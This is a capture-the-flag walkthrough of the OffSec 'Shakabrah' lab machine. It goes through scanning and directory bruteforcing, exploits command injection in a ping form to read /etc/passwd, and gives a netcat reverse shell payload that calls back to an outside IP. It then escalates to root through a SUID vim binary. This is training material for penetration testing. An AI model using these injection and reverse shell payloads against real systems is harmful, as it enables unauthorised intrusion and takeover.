Shakabrah Walkthrough OffSec
Santosh Kumar
Cyber Security Enthusiast || CEHv12 || CTF Player || Security Researchers || TryHacMe Top 1% ||Programing C,Python || Bug Bounty ||
In this walkthrough, I'll take you through the steps to tackle the "Shakabrah" box from OffSec. This concise guide covers the essential stages from reconnaissance to privilege escalation, providing a clear path to capturing the flags.
Rutscan: Identify open ports and services.
rustscan -a 192.168.158.86 -- -A
HTTP Service: Explore the website manually.
Directory Bruteforcing: Discover hidden directories
gobuster dir -u https://192.168.158.86 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
From here, we can attempt to gain RCE by exploring the interface's capabilities. Instead of fuzzing to discover which commands we can execute—though that is a valuable exercise on its own—we can manually investigate. Specifically, we should determine if it allows command chaining.
ping 192.168.158.86;
ping 192.168.158.86;cat /etc/passwd
Now we will try to get RCE using this command injection vulnerability.
Payloads reverse shell.
192.168.158.86;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.45.232 80 >/tmp/f
We get our shell back and we now have access as www-dat.
we will use this shell from https://www.revshells.com/
Change the directory to /home/dylan, where you'll find a file named local.txt. Use the cat command to read the file and obtain your first flag.
Privilege Escalation:
find / -type f -perm -u=s 2>/dev/null
Here, it shows that vim.basic has the SUID bit set. By checking GTFObins
: we find several exploitation methods. Here is the one I used:
run this command /usr/bin/vim.basic
:py3 import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")
xterm
cd /root here you have proof.txt now simply cat proof.txt to get your root flag
Great article! Very insightful for both beginners and experienced pen testers. Thanks for sharing! ?? #CyberSecurity #PenTesting #CTF